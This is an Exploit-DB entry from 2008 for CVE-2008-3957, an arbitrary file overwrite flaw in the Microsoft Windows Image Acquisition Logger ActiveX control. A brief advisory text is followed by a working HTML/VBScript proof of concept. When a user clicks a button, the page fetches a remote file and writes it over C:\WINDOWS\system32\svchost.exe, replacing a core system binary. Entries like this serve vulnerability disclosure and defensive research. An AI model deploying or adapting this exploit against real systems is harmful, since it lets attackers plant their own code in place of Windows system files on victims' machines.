Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite Vulnerability 1

2008-09-08T00:00:00
ID EDB-ID:32344
Type exploitdb
Reporter Ciph3r
Modified 2008-09-08T00:00:00

Description

Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite Vulnerability (1). CVE-2008-3957. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/31069/info

Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.

An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks. 

<object classid="clsid:A1E75357-881A-419E-83E2-BB16DB197C68" id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   dim remURL
   remURL = "http://victim.com/svchost.exe"
   test.Open remURL, True
   test.Save "C:\WINDOWS\system32\svchost.exe", True
 End Sub
</script>